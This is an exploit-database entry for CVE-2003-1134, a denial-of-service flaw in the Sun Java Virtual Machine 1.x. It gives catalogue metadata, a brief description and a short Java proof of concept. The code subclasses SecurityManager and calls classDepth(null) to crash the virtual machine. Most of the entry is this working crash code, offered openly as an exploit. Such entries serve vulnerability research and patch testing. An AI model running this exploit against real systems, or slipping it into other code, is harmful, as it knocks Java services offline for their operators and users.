EXPLOITS

Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service

Author: Marc Schoenefeld
type: dos
platform: multiple
port: 
date_added: 2003-10-26  
date_updated: 2012-12-11  
verified: 1  
codes: CVE-2003-1134;OSVDB-19184  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23292.java  

source: https://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine.

/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

public void doit() {
System.out.println("doit");
int o = classDepth(null);
}

public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}